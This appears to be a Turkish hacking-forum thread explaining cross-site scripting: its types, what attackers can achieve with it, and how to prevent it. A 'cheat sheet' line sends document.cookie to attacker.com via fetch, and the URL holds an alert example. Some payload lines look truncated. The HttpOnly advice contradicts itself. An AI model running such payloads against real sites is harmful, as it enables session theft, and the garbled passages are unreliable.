Siber Alem / Forum / Thread / 22 / Xss-cross-site-scripting-nedi-r-turkce-detayli-anlatim-rehber
thread_22.sh

XSS (Cross-Site Scripting) NEDİR? - TÜRKÇE DETAYLI ANLATIM & REHBER

2 replies 7 views Web Security
Admin
ROOT OP
Rank: Elite
Posts: 39
Rep: 1381
Joined: 2020-01
Rep Progress 1381 / 500
2026-07-21 20:48:18

Selamlar Siber Alem ailesi, bugün sizlere web uygulama güvenliğinde en sık karşımıza çıkan ve Bug Bounty avcılarının en sevdiği zafiyetlerden biri olan XSS (Cross-Site Scripting) zafiyetini kendi tecrübelerimle detaylıca anlatacağım.

XSS Architecture Overview

XSS nedir kısa bir özet geçmek gerekirse: Bir web sitesinin kullanıcıdan aldığı veriyi yeterince süzmeden veya arındırmadan tarayıcıya geri basması sonucu, kurbanın tarayıcısında zararlı JavaScript kodlarının çalıştırılmasıdır.

XSS zafiyeti 3 temel türe ayrılır dostlar:

  1. Reflected XSS: Saldırganın hazırladığı zararlı linke kurban tıklar. Girdi doğrudan URL parametresinden alınır ve sayfaya yansıtılır. Kalıcı değildir.

Örnek URL:

https://hedef-site.com/search?q=<script>alert('SiberAlem')</script>
  1. Stored (Kalıcı) XSS: En tehlikeli XSS türüdür. Zararlı JavaScript kodu veritabanına, yorum alanına veya profil bilgisine kaydedilir. O sayfayı ziyaret eden HERKESİN tarayıcısında bu kod otomatik çalışır. Örneğin bir forum yorum alanına script yapıştırmak gibi.

  2. DOM-Based XSS: Sunucu tarafında hiçbir şey değişmez. Tüm olay kurbanın kendi tarayıcısındaki JavaScript kodlarının (document.location, innerHTML vb.) veriyi güvenli olmadan işlemesinden kaynaklanır.

Peki kurbanın tarayıcısında kod çalıştırınca ne yapabiliyoruz?

  • Kurbanın session çerezlerini (cookie) çalarak hesabına doğrudan sızabilirsiniz.
  • Sahte giriş formları (phishing) oluşturup şifresini çalabilirsiniz.
  • Kullanıcı adına sitede yetkisiz işlemler (arkadaş ekleme, mesaj atma) yaptırabilirsiniz.

🎥 İlgili Video Anlatımı & Uygulamalı Gösterim: YouTube: Web Application Security - Cross-Site Scripting (XSS) Walkthrough

<!-- XSS Payload Hile Sayfası (Cheat Sheet) -->
<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>
<img src=x>
<svg>

XSS Engellemek İçin Ne Yapılmalı? Sunucu tarafında kullanıcıdan gelen HER GİRDİ HTML Entity Encoding işleminden geçirilmelidir. Yani '<' karakteri '&lt;' olarak dönüştürülmelidir. Ayrıca çerezlere kesinlikle HttpOnly bayrağı eklenmelidir ki JavaScript kodları çerezleri okuyablesin.

Umarım faydalı bir anlatım olmuştur, sorularınızı başlık altından sorabilirsiniz arkadaşlar.

Topic Gallery (2)

Awards & Badges
Script Kiddie
Member
Elite
Trancer
USER
Rank: Script Kiddie
Posts: 8
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 23:57:59

Eline sağlık harika bir özet olmuş dostum! Özellikle DOM-based XSS tarafında innerHTML yerine textContent kullanılması gerektiğini ekleyebiliriz. Bug bounty yaparken WAF bypass için SVG payload'ları çok iş yapıyor.

Awards & Badges
BlackH
USER
Rank: Script Kiddie
Posts: 8
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 23:57:59

Çok açıklayıcı ve temiz anlatım olmuş kardeşim. HttpOnly bayrağı eklendiğinde çerezler okunamıyor ama kurban adına arka planda istek atmak (XSS + CSRF birleşimi) halen mümkün kalıyor, ona da dikkat etmek lazım.

Awards & Badges
mu-b
USER
Rank: Script Kiddie
Posts: 9
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 23:57:59

Reis ellerine sağlık, XSS avlarken Burp Suite Intruder ile fuzzing yaparken kullandığın tavsiye ettiğin bir wordlist var mıdır?

Awards & Badges

Login Required

You must log in to write a reply. Join the Siber Alem hacker community!

Thread Statistics

Views 7
Replies 2
Author Admin
Created 2026-07-21
Status
Open

Security Advisory

All exploits, papers, and code shared on the Siber Alem database are strictly for educational and research purposes. Using them for malicious purposes is strictly prohibited and the user assumes all liabilities.